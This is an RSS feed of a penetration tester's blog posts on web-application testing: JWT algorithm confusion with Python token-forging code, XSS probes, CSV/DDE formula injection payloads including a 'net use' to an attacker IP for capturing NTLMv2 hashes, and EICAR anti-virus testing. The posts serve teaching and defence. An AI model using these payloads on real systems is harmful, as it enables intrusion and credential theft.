<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Explore Security &#187; Web Applications</title>
	<atom:link href="http://www.exploresecurity.com/category/web-applications/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.exploresecurity.com</link>
	<description>IT security tools, techniques and commentary</description>
	<lastBuildDate>Wed, 15 Jun 2022 09:21:02 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.6.1</generator>
		<item>
		<title>The Case of the Customer Data and the Third-Party Analytics Site</title>
		<link>http://www.exploresecurity.com/the-case-of-the-customer-data-and-the-third-party-analytics-site/</link>
		<comments>http://www.exploresecurity.com/the-case-of-the-customer-data-and-the-third-party-analytics-site/#comments</comments>
		<pubDate>Fri, 17 May 2019 15:32:32 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Data Privacy]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[GDPR]]></category>
		<category><![CDATA[penetration testing]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=460</guid>
		<description><![CDATA[I recently had an article published on the NCC Group blog about a pentest during which it became clear that customer personal data was being sent to a third party. It&#8217;s common for websites to use metrics/analytics services to collect usage data on how users are interacting with the sites. I thought it would be [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>I recently had an article <a href="https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/may/the-case-of-the-customer-data-and-the-third-party-analytics-site/">published</a> on the NCC Group blog about a pentest during which it became clear that customer personal data was being sent to a third party. It&#8217;s common for websites to use metrics/analytics services to collect usage data on how users are interacting with the sites. I thought it would be useful to highlight the danger of sensitive data being accidentally sent to third parties without due care and attention paid to GDPR. Have a read!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/the-case-of-the-customer-data-and-the-third-party-analytics-site/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>JWT Attack Walk-Through</title>
		<link>http://www.exploresecurity.com/jwt-attack-walk-through/</link>
		<comments>http://www.exploresecurity.com/jwt-attack-walk-through/#comments</comments>
		<pubDate>Fri, 25 Jan 2019 10:13:31 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[JWT]]></category>
		<category><![CDATA[OpenSSL]]></category>
		<category><![CDATA[web apps]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=455</guid>
		<description><![CDATA[Over on the NCC Group website I published a solution to an open demonstration of the well-known JSON Web Token (JWT) algorithm confusion vulnerability (the one where you swap the token algorithm from &#8216;RS&#8217; to &#8216;HS&#8217; and sign your payload with the public key). I use OpenSSL to gain full visibility of what&#8217;s happening and, [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Over on the NCC Group website I <a href="https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/january/jwt-attack-walk-through/">published</a> a solution to an open demonstration of the well-known JSON Web Token (JWT) algorithm confusion vulnerability (the one where you swap the token algorithm from &#8216;RS&#8217; to &#8216;HS&#8217; and sign your payload with the <em>public</em> key). I use OpenSSL to gain full visibility of what&#8217;s happening; if you ever need to test this vulnerability yourself, walking through the method will hopefully help you avoid false negatives.</p>
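<p>As a rough illustration of the attack (a sketch, not the code from the article &#8211; the payload and PEM bytes here are made up), the forged token needs nothing more than the Python standard library: declare HS256 in the header and HMAC-sign using the server&#8217;s public key bytes as the secret:</p>

```python
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    # JWT uses unpadded base64url encoding.
    return base64.urlsafe_b64encode(data).rstrip(b'=').decode()

def forge_hs256(payload: dict, public_key_pem: bytes) -> str:
    # Algorithm confusion: declare HS256 and sign with the server's
    # *public* key bytes as the HMAC secret. A server that trusts the
    # header's alg and verifies with the same public key will accept it.
    header = b64url(json.dumps({'alg': 'HS256', 'typ': 'JWT'},
                               separators=(',', ':')).encode())
    body = b64url(json.dumps(payload, separators=(',', ':')).encode())
    signing_input = (header + '.' + body).encode()
    sig = hmac.new(public_key_pem, signing_input, hashlib.sha256).digest()
    return header + '.' + body + '.' + b64url(sig)
```

<p>Note that the exact bytes used as the HMAC key matter (PEM with or without trailing newline, DER, etc.), which is one reason a careless test can produce a false negative.</p>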
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/jwt-attack-walk-through/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Missing XSS flaws with innerHTML and jQuery</title>
		<link>http://www.exploresecurity.com/missing-xss-flaws-with-innerhtml-and-jquery/</link>
		<comments>http://www.exploresecurity.com/missing-xss-flaws-with-innerhtml-and-jquery/#comments</comments>
		<pubDate>Wed, 28 Mar 2018 15:11:42 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[jQuery]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[web apps]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=440</guid>
		<description><![CDATA[I thought a couple of gotchas when testing for XSS could be a useful post. Not new, especially, but I haven&#8217;t posted for a while. It shows how you might think you&#8217;ve covered an area of a web application and declared it free from XSS but in fact there might be a bug left behind. [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>I thought a couple of gotchas when testing for XSS could be a useful post. Not new, especially, but I haven&#8217;t posted for a while. It shows how you might think you&#8217;ve covered an area of a web application and declared it free from XSS but in fact there might be a bug left behind.<span id="more-440"></span></p>
<p>These days a typical web app pulls in data from background XHR requests, the responses come back in a data format like JSON, and the data is parsed client-side and inserted into the DOM of the page. This means, of course, that the encoding of the data in the response is not sufficient by itself to know whether there’s a potential XSS risk – it depends how the data is finally encoded when inserted into the page. But consider the following:</p>
<ol>
<li>You enter <code>&lt;script&gt;alert(1)&lt;/script&gt;</code> hoping for a quick and dirty win – nothing</li>
<li>You suspect input validation so you enter something that you hope will pass validation but test encoding, e.g. <code>xss &lt; &gt; test</code></li>
<li>You inspect the page using the browser dev tools and see it has been inserted as <code>xss &amp;lt; &amp;gt; test</code></li>
<li>So the encoding looks good, and you move on&#8230;</li>
</ol>
<p>But wait! Even dangerous DOM manipulation can perform encoding in a text context. For example, <code>innerHTML</code> will observe the <a href="https://w3c.github.io/DOM-Parsing/#xml-serializing-a-text-node">rules</a> and, in a text context, will encode <code>&lt;</code> as <code>&amp;lt;</code> and <code>&gt;</code> as <code>&amp;gt;</code> (and <code>&amp;</code> as <code>&amp;amp;</code> in fact), otherwise those characters are inserted/parsed literally. So the encoding seen in step 3 could be explained by this, meaning that the potential for XSS still exists. It’s precisely because jQuery uses <code>innerHTML</code> as part of functions like <a href="http://api.jquery.com/append/"><em>append()</em></a> that the documentation is full of caveats about not using data from &#8220;untrusted sources&#8221;.</p>
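<p>To see why step 3 is inconclusive: safe server-side encoding and text-node serialisation produce exactly the same entity form for this probe, so the bytes you see in the dev tools don&#8217;t tell you which one happened. A quick check (Python used purely for illustration of the encoding):</p>

```python
from html import escape

# Server-side HTML-encoding of the probe string from step 2...
encoded = escape('xss < > test', quote=False)
# ...yields exactly the entity form observed in step 3, which is also
# what text-node serialisation produces when innerHTML is read back.
print(encoded)  # xss &lt; &gt; test
```
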
<p>Let’s assume the developers haven’t thought about XSS at all. So why did step 1 fail? This is because the <a href="https://www.w3.org/TR/2008/WD-html5-20080610/dom.html#innerhtml0">spec</a> says &#8220;script elements inserted using <code>innerHTML</code> do not execute when they are inserted&#8221;. If the first test case had been <code>&lt;img src=x onerror=alert(1)&gt;</code> the XSS would have been revealed in step 1.</p>
<p>Hope that’s of some use!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/missing-xss-flaws-with-innerhtml-and-jquery/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>From CSV to CMD to qwerty</title>
		<link>http://www.exploresecurity.com/from-csv-to-cmd-to-qwerty/</link>
		<comments>http://www.exploresecurity.com/from-csv-to-cmd-to-qwerty/#comments</comments>
		<pubDate>Tue, 19 Apr 2016 22:53:41 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Passwords]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[CSV]]></category>
		<category><![CDATA[DDE]]></category>
		<category><![CDATA[Excel]]></category>
		<category><![CDATA[XLS]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=415</guid>
		<description><![CDATA[The ongoing breach stories of targeted email campaigns harbouring malicious attachments made me think of writing up a summary of a presentation I gave at the amazing NCC Con held in Dublin in January this year. The talk was based on a pentesting war story that started off exploiting the old (but I believe often [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>The ongoing breach stories of targeted email campaigns harbouring malicious attachments made me think of writing up a summary of a presentation I gave at the amazing <a href="https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/january/ncc-con-europe-2016/">NCC Con</a> held in Dublin in January this year. The talk was based on a pentesting war story that started off exploiting the old (but I believe often overlooked) Dynamic Data Exchange (DDE) trick to go from an Excel export function in a web app to OS code running on users&#8217; workstations. From there, the story takes us on to domain creds via some NTLMv2 theory (without a pentest laptop), a bug in hashcat and a new script &#8220;catflap&#8221;.<span id="more-415"></span></p>
<p>[EDIT - for more of the <em>CSV</em> and <em>CMD</em> and less of the <em>qwerty</em>, take a look at this <a href="http://www.slideshare.net/exploresecurity/camsec-sept-2016-tricks-to-improve-web-app-excel-export-attacks">presentation</a> I did later in the year.]</p>
<h3>From CSV to CMD</h3>
<p>DDE is an old <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms648774(v=vs.85).aspx">Microsoft technology</a> used to facilitate data transfer between applications, a form of Inter-Process Communication (IPC). The security risks in the context of web applications were, to my knowledge, first published <a href="http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/">here</a> by <a href="https://twitter.com/albinowax">James Kettle</a> (I would have sworn this technique was around before 2014 &#8211; how time flies).</p>
<p>A brief reminder then: imagine an export function in a web app, where some of the data in the cells comes from user input (so, like persistent XSS, it is stored and later reflected), e.g. consider an application that stores the following parameter value:</p>
<p><code>=cmd|'/k ipconfig'!A0</code></p>
<p style="text-align: left;">On requesting an export, a CSV file is returned that includes this value in a field. When this file is opened, Excel knows that this DDE reference could be dangerous and issues a couple of warnings:<a href="http://www.exploresecurity.com/wp-content/uploads/2016/04/warning1.png"><img class="aligncenter  wp-image-417" alt="warning1" src="http://www.exploresecurity.com/wp-content/uploads/2016/04/warning1.png" width="410" height="194" /></a><a href="http://www.exploresecurity.com/wp-content/uploads/2016/04/warning2.png"><img class="aligncenter size-full wp-image-416" alt="warning2" src="http://www.exploresecurity.com/wp-content/uploads/2016/04/warning2.png" width="781" height="139" /></a>In this case, an eagle-eyed user might raise an eyebrow at CMD.EXE but, as the original article notes, if the user requested the Excel file and it came from a source they trust, why wouldn&#8217;t it be secure? And we know that users click through warnings anyway.</p>
<p style="text-align: left;">When <code>cmd /k ipconfig</code> runs, the /k persists the command window for a screenshot to use in the report <img src='http://www.exploresecurity.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> <a href="http://www.exploresecurity.com/wp-content/uploads/2016/04/cmd-ipconfig.png"><img class="aligncenter size-full wp-image-420" alt="cmd-ipconfig" src="http://www.exploresecurity.com/wp-content/uploads/2016/04/cmd-ipconfig.png" width="1437" height="455" /></a>In fact, without that persistence, the command seems to run in a minimised window and then of course exits, which is rather nice for our attacker. I should say that export to CSV seems to be cleaner from the attacker&#8217;s perspective than export to XLS or XLSX, which often requires extra action by the user to activate the payload such as clicking into the malicious cell, which isn&#8217;t desirable. All of this behaviour is subject to the version of Excel running and its configuration.</p>
<h3>From CMD to qwerty</h3>
<p>The war story concerned an <em>internal</em> application that was vulnerable to the DDE trick, and so I started playing around with payloads that would be more exciting than <code>ipconfig</code> or <code>calc</code>. Here&#8217;s a simple one:</p>
<p><code>cmd /c net use \\&lt;attacker_IP&gt;\c$</code></p>
<p>In this case the &#8220;attacker_IP&#8221; belonged to a locked-down workstation (no pentest laptops allowed) &#8211; but it did, curiously enough, have Wireshark installed. So here was the &#8220;net use&#8221; connection from the &#8220;victim&#8221; (which was in fact a machine I was using and thus I knew the username and password):<a href="http://www.exploresecurity.com/wp-content/uploads/2016/04/net-use.png"><img class="aligncenter size-full wp-image-421" alt="net-use" src="http://www.exploresecurity.com/wp-content/uploads/2016/04/net-use.png" width="1189" height="303" /></a>Bear in mind this was an internal test: if the victim was using a vulnerable internet-facing website, their ISP would likely <em>[cough]</em> block the outgoing SMB connection.</p>
<p>I was dealing with NTLMv2 here: a quick <a href="http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats">reminder</a> showed that I needed to pull out the following for John:</p>
<p><strong><code>username:$<span style="color: green;">NETNTLMv2</span>$domain$challenge$HMAC-MD5$blob</code><br />
</strong><br />
What&#8217;s in <span style="color: green;"><strong>green</strong></span> is known at this point (&#8220;NETNTLMv2&#8221; is a constant). I could immediately fill in the domain and username fields as they&#8217;re given away in cleartext by the NTLMv2 exchange, helpfully pulled out in the (obfuscated) Packet List above (and anonymised below):</p>
<p><strong><code><span style="color: green;">smithjer</span>:$<span style="color: green;">NETNTLMv2</span>$<span style="color: green;">domain</span>$challenge$HMAC-MD5$blob<br />
</code></strong><br />
So what about the other bits? They all relate to the NTLM authentication, which is a challenge-handshake protocol:</p>
<p><b>1. Client &gt; Server (Type 1, negotiation)</b><br />
Features supported by the client and requested of the server<br />
<b>2. Server &gt; Client (Type 2, challenge)</b><br />
Features supported and agreed upon by the server + a challenge<br />
<b>3. Client &gt; Server (Type 3, authentication)</b><br />
More information about the client + response(s)</p>
<p>The essential difference between NTLM and NTLMv2 is how the response is calculated. NTLM uses MD4 and DES in a weak, well-known way (5 NULL bytes <em>yada yada yada</em>); NTLMv2 uses HMAC-MD5 based on more than just the password and challenge, which is where the &#8220;blob&#8221; comes in. That covers the &#8220;challenge&#8221;, &#8220;HMAC-MD5&#8221; and &#8220;blob&#8221; missing from the John hash I&#8217;m having to build up from scratch. (Remember, I had no tools, otherwise <a href="https://github.com/SpiderLabs/Responder">Responder</a> would have made this easy.) Here&#8217;s the challenge:<a href="http://www.exploresecurity.com/wp-content/uploads/2016/04/challenge.png"><img class="aligncenter size-full wp-image-422" alt="challenge" src="http://www.exploresecurity.com/wp-content/uploads/2016/04/challenge.png" width="442" height="151" /></a>And here&#8217;s the HMAC-MD5 and blob (which is everything after the HMAC in the &#8220;NTLM Response tree&#8221;):<a href="http://www.exploresecurity.com/wp-content/uploads/2016/04/HMAC-blob.png"><img class="aligncenter size-full wp-image-423" alt="HMAC-blob" src="http://www.exploresecurity.com/wp-content/uploads/2016/04/HMAC-blob.png" width="663" height="261" /></a>To get the blob, you can copy the NTLM Response bytes from within Wireshark and remove the first 16 bytes (which is the HMAC). The blob is likely to start 0x01010000&#8230; So we now have:</p>
<p><code><strong><span style="color: green;">smithjer</span>:$<span style="color: green;">NETNTLMv2</span>$<span style="color: green;">domain</span>$<span style="color: green;">36edff8376e59e18</span>$<span style="color: green;">4f68b56e9ce788d010f58b4f049b5c7f</span>$<span style="color: green;">0101000000000000295779de01bbd001b6f955bf062e...</span></strong><br />
</code><br />
That&#8217;s the hard part done, right? Wrong.</p>
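<p>For reference, the response construction described above can be sketched in a few lines of Python (illustrative only &#8211; it assumes you already have the user&#8217;s NT hash, i.e. MD4 of the UTF-16LE password, since MD4 isn&#8217;t always available in <code>hashlib</code>):</p>

```python
import hashlib
import hmac

def ntlmv2_response(nt_hash: bytes, username: str, domain: str,
                    challenge: bytes, blob: bytes) -> str:
    # NTLMv2 key: HMAC-MD5 over UPPER(username) + domain in UTF-16LE,
    # keyed with the NT hash (MD4 of the UTF-16LE password).
    v2_key = hmac.new(nt_hash,
                      (username.upper() + domain).encode('utf-16le'),
                      hashlib.md5).digest()
    # Response (the HMAC-MD5 field of the hash above): HMAC-MD5 over
    # the server challenge concatenated with the blob, keyed with v2_key.
    return hmac.new(v2_key, challenge + blob, hashlib.md5).hexdigest()
```

<p>Feed it the challenge and blob pulled out of Wireshark, and the result should match the 16-byte HMAC at the front of the NTLM Response field when the password is correct.</p>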
<h3>Let&#8217;s get cracking</h3>
<p>Here was John&#8217;s response (bear in mind I knew the password), and, after duly modifying the hash format, hashcat wasn&#8217;t happy either:<a href="http://www.exploresecurity.com/wp-content/uploads/2016/04/hash-no-crack.png"><img class="aligncenter size-full wp-image-424" alt="hash-no-crack" src="http://www.exploresecurity.com/wp-content/uploads/2016/04/hash-no-crack.png" width="718" height="284" /></a>Note the &#8220;skipping line&#8221; error. Turns out hashcat has a bug, which (I later found out) oclhashcat doesn&#8217;t suffer from. I experimented with it and <a href="https://github.com/hashcat/hashcat/issues/3">reported</a> it &#8211; hashcat has problems when the blob length is over 224 bytes. For some reason, it&#8217;s not been assigned a &#8220;bug&#8221; label but a &#8220;new feature&#8221; label. Anyway, back to John: remember the format on the cheatsheet was:</p>
<p><strong><code>username:$NETNTLMv2$domain$challenge$HMAC-MD5$blob</code></strong></p>
<p>Turns out the hashcat format worked a treat, i.e.</p>
<p><code><strong>username::domain:challenge:HMAC-MD5:blob</strong></code></p>
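<p>Converting between the two formats is purely mechanical &#8211; a throwaway Python helper (hypothetical, not part of any tool mentioned here) makes the mapping explicit:</p>

```python
def john_to_hashcat(john_hash: str) -> str:
    # john:    username:$NETNTLMv2$domain$challenge$HMAC-MD5$blob
    # hashcat: username::domain:challenge:HMAC-MD5:blob
    username, rest = john_hash.split(':$NETNTLMv2$', 1)
    domain, challenge, hmac_md5, blob = rest.split('$')
    return '{}::{}:{}:{}:{}'.format(username, domain,
                                    challenge, hmac_md5, blob)
```
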
<p>To be fair to pentestmonkey, &#8220;this sheet was originally based on john-1.7.8-jumbo-5. Changes in supported hashes or hash formats since then may not be reflected on this page&#8221;, and I was using a later version. Anyway, all&#8217;s well that ends well:<a href="http://www.exploresecurity.com/wp-content/uploads/2016/04/hash-cracked-john.png"><img class="aligncenter size-full wp-image-428" alt="hash-cracked-john" src="http://www.exploresecurity.com/wp-content/uploads/2016/04/hash-cracked-john.png" width="919" height="116" /></a></p>
<h3>catflap</h3>
<p>In order to look into the bug I found, I wrote a script (which I called <a href="https://github.com/exploresecurity/catflap"><em>catflap</em></a>) that serves two purposes:</p>
<ol>
<li>It extracts what hashcat needs from the NTLMv2 exchange in a Wireshark capture file.</li>
<li>It allows you to produce a more realistic test case to check that your NTLMv2 cracker is working properly. For this, catflap will accept a normal hash from a file as well as a capture file, and will recalculate the NTLMv2 response based on a password you supply. This means all the other variables (username, domain, challenge and, crucially, the blob) in the resulting test hash are exactly the same as the ones in your captured exchange, but in this test case you know the password. That makes it a better test of your cracking tool than the standard hash examples out there, useful though they are. Of course, you could also play about with other inputs, which is what I did with the blob to find the bug.</li>
</ol>
<p>Usage is simply:</p>
<p><code>catflap &lt;capture_file | hashcat_file&gt; [password]</code></p>
<p>The following shows catflap changing the HMAC response to set the password to &#8220;password&#8221;:<a href="http://www.exploresecurity.com/wp-content/uploads/2016/04/catflap.png"><img class="aligncenter size-full wp-image-429" alt="catflap" src="http://www.exploresecurity.com/wp-content/uploads/2016/04/catflap.png" width="962" height="400" /></a>You can then run that edited hash through your cracker of choice to ensure it spits out &#8220;password&#8221;. If not, something&#8217;s gone wrong. You can find catflap on <a href="https://github.com/exploresecurity/catflap">github</a>.</p>
<h3>Input validation and sanitisation</h3>
<p>Whenever I find an Excel export function in a web app, the DDE trick usually works because the characters used to launch the payload aren&#8217;t the usual suspects. It&#8217;s not a well-known attack vector, even among pentesters (or at least it&#8217;s been forgotten), so it&#8217;s worth remembering to check for it.</p>
<p>What about remediation? The <a href="https://web.archive.org/web/20160324063226/http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/"><em>original</em></a> article on this stated that &#8220;the best defence strategy we are aware of is prefixing cells that start with &#8216;=&#8217; with an apostrophe&#8221;. Last month this topic came up in a company-wide discussion at <a href="https://www.nccgroup.trust/">work</a>, and my colleague <a href="https://twitter.com/bones_codes">Cara Marie</a> noted that &#8216;+&#8217; and &#8216;-&#8217; could be used to launch a command too. Turns out (thanks to Michael Roberts, another NCC bod) that this had been lurking around for a while, for example <a href="https://hackerone.com/reports/72785">here</a>. Michael added that you can also use &#8216;@&#8217; in the format:</p>
<p><code>@SUM(cmd|'/c calc'!A0)</code></p>
<p>as well as surrounding the payload with quotes such as:</p>
<p><code>"=cmd|'/c calc'!A0"</code>.</p>
<p>Over this last month the original article has been updated twice to reflect the same findings (except for the use of quotes). So, as far as I know, two independent groups came up with new bypasses for the original recommendation. The point here, then, is that the blacklist approach by itself often fails (which shouldn&#8217;t be news to anyone who&#8217;s done a re-test). We need to perform validation based on a whitelist of characters and syntax wherever possible. For example, if a field is a phone number, there should be no need for characters such as &#8216;=&#8217; and &#8216;@&#8217;. Starting off with &#8216;+&#8217; is reasonable (prefixing an international dialling code) but after that we shouldn&#8217;t see any non-numeric characters. We can restrict the length of the field too. With these restrictions in place, we don&#8217;t even need to implement (and maintain) a blacklist.</p>
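<p>As a sketch of the two approaches (illustrative rules of my own, not a drop-in defence), the apostrophe-prefix blacklist and a whitelist phone-number check might look like this in Python:</p>

```python
# Formula-trigger characters discussed above; tab and CR are commonly
# also listed as triggers in CSV-injection guidance (assumption here).
DANGEROUS_PREFIXES = ('=', '+', '-', '@', '\t', '\r')

def sanitise_cell(value: str) -> str:
    # Blacklist approach: prefix an apostrophe so the spreadsheet
    # treats the cell as literal text rather than a formula.
    if value.startswith(DANGEROUS_PREFIXES):
        return "'" + value
    return value

def is_valid_phone(value: str) -> bool:
    # Whitelist approach: optional leading '+', then digits and spaces
    # only, with a length cap - '=' or '@' can never get through.
    if not 1 <= len(value) <= 16:
        return False
    body = value[1:] if value.startswith('+') else value
    return body.replace(' ', '').isdigit()
```

<p>Note how the whitelist check makes the blacklist redundant for this field: there is simply no way to smuggle a formula trigger through it.</p>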
<h3>Red teaming</h3>
<p>The story of this article was set around a web application that allowed export but the DDE trick is valuable to red teams trying to get malicious attachments through email. The reason for this is that a DDE payload isn&#8217;t a macro and files that use it are often able to fly through perimeter content checks that would stop files with macros.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/from-csv-to-cmd-to-qwerty/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Testing for Anti-Virus on File Upload</title>
		<link>http://www.exploresecurity.com/testing-for-anti-virus-on-file-upload/</link>
		<comments>http://www.exploresecurity.com/testing-for-anti-virus-on-file-upload/#comments</comments>
		<pubDate>Tue, 26 May 2015 21:42:17 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[anti-virus]]></category>
		<category><![CDATA[EICAR]]></category>
		<category><![CDATA[file upload]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=386</guid>
		<description><![CDATA[One of the issues on a standard web app checklist is to test whether or not an application that supports file upload is scanning those files for malware. This article reviews the methodology and highlights the danger of corrupting an EICAR test file so that it no longer acts as a valid test. It is [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>One of the issues on a standard web app checklist is to test whether or not an application that supports file upload is scanning those files for malware. This article reviews the methodology and highlights the danger of corrupting an EICAR test file so that it no longer acts as a valid test. It is based on an internal presentation I gave, the slides for which are <a href="http://www.slideshare.net/exploresecurity/antivirus-checking-on-file-upload">here</a>.<span id="more-386"></span></p>
<h3>Methodology</h3>
<p>It&#8217;s really quite simple &#8211; upload a file, download it and compare the hashes. If the upload succeeds but you don&#8217;t download the file again, that&#8217;s not sufficient proof &#8211; perhaps the file has been silently quarantined. Showing that the hashes of the uploaded and downloaded files are the same proves that the file has not been cleaned up. (If no download feature is available, you can only <em>speculate</em> from the lack of an error message on upload.)</p>
<p>It&#8217;s obviously unfair to report a system lacking AV if the file you upload gets only 1 out of 57 hits on VirusTotal, for example. So running the file through VirusTotal and including a screenshot in the report shows the client that the file should have been detected. The output of VirusTotal includes a SHA-256 hash so that nicely ties in with hashing the uploaded and downloaded files, mentioned above.</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2015/05/virustotal.jpg"><img class="aligncenter size-full wp-image-390" alt="virustotal" src="http://www.exploresecurity.com/wp-content/uploads/2015/05/virustotal.jpg" width="577" height="245" /></a></p>
<h3>Which file?</h3>
<p>Of course, you don&#8217;t want to be uploading real malware. This is where the EICAR test comes in &#8211; a widely adopted benign signature that triggers an alert so that you can be sure your anti-virus product is running correctly. So, during a web application assessment, you put together a test file thus:</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2015/05/eicar-notepad.jpg"><img class="aligncenter size-full wp-image-388" alt="eicar-test" src="http://www.exploresecurity.com/wp-content/uploads/2015/05/eicar-notepad.jpg" width="1225" height="276" /></a></p>
<p>You upload and download it with no problem &#8211; so the files aren&#8217;t being checked for malware, right? Wrong. Take a look at the VirusTotal result for this file:</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2015/05/vt-eicar-notepad.jpg"><img class="aligncenter size-full wp-image-389" alt="vt-eicar-test" src="http://www.exploresecurity.com/wp-content/uploads/2015/05/vt-eicar-notepad.jpg" width="585" height="243" /></a></p>
<p>It would be unfair to report a lack of anti-virus scanning using this file as a test case &#8211; and not, as we&#8217;ll soon see, because most of the AVs have missed it.</p>
<p>Okay, what about this Word document?</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2015/05/eicar-word.jpg"><img class="aligncenter size-full wp-image-396" alt="eicar-word" src="http://www.exploresecurity.com/wp-content/uploads/2015/05/eicar-word.jpg" width="1153" height="313" /></a></p>
<p>Hopefully that was a no-brainer. This file got no hits on VirusTotal because the document text isn&#8217;t stored exactly as it&#8217;s seen and thus the EICAR signature was not in the raw file at all.</p>
<h3>The EICAR test</h3>
<p>If you haven&#8217;t already guessed, the EICAR test specification is stricter than the appearance of that well-known string. According to the <a href="http://www.eicar.org/86-0-Intended-use.html">EICAR site</a> &#8220;any anti-virus product that supports the EICAR test file should detect it in any file providing that the file starts with the following 68 characters&#8230;<code>X5O!P&#37;@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*</code>&#8220;. Don&#8217;t be fooled by the printable ASCII, though &#8211; the file is in fact executable, shown below on a Windows XP SP3 machine:</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2015/05/eicar-running.jpg"><img class="aligncenter size-full wp-image-387" alt="eicar-running" src="http://www.exploresecurity.com/wp-content/uploads/2015/05/eicar-running.jpg" width="1037" height="374" /></a></p>
<p>Let&#8217;s take that Word doc and, using a hex editor, stick the EICAR signature at the front:</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2015/05/eicar-word-ed.jpg"><img class="aligncenter size-full wp-image-391" alt="eicar-word-ed" src="http://www.exploresecurity.com/wp-content/uploads/2015/05/eicar-word-ed.jpg" width="972" height="307" /></a></p>
<p>Now VirusTotal reports 26 out of 56 (46%). In contrast, when we put the signature elsewhere in the file (middle or end), we get 1 out of 57 hits.</p>
<p>Technically the anti-virus products that <em>haven&#8217;t</em> reported the file are quite right not to do so because there&#8217;s another condition that the file &#8220;is exactly 68 bytes long&#8221;. The spec goes on to say, though, that &#8220;it may be optionally appended by any combination of whitespace characters with the total file length not exceeding 128 characters. The only whitespace characters allowed are the space character, tab, LF, CR, CTRL-Z&#8221;.</p>
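<p>Those two rules are easy to encode as a quick sanity check before you upload your test file &#8211; a Python sketch of the spec as quoted above:</p>

```python
# The 68-byte EICAR signature, split only to keep the line short.
EICAR = (r'X5O!P%@AP[4\PZX54(P^)7CC)7}'
         r'$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*').encode()
# Only these padding bytes are allowed: space, tab, LF, CR, CTRL-Z.
PADDING = set(b' \t\n\r\x1a')

def is_valid_eicar(data: bytes) -> bool:
    # Must start with the 68-byte signature, may be padded only with
    # the allowed whitespace characters, and must not exceed 128 bytes.
    if not data.startswith(EICAR) or len(data) > 128:
        return False
    return all(byte in PADDING for byte in data[len(EICAR):])
```

<p>Running your modified test file through a check like this tells you whether a miss is a genuine AV failure or just an invalid EICAR file.</p>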
<p>So let&#8217;s truncate the Word doc to 112 bytes &#8211; and this time VirusTotal reports 34 out of 56 hits (61%), compared to the original 26 (46%). As you can imagine, as we edit the file to get closer and closer to the original EICAR file, the hit rate goes up and up.</p>
<h3>In summary</h3>
<p>When testing file uploads for the presence of anti-virus scanning, the test file should be picked up by a significant number of AVs otherwise it’s not a fair test. To this end, it’s safest to use the EICAR file – but if you mess with the original too much (even if the signature is still intact), you might inadvertently create a file that isn’t an EICAR test at all. The specification for the EICAR test file is actually quite strict, although AVs tend to be overzealous in reporting it.</p>
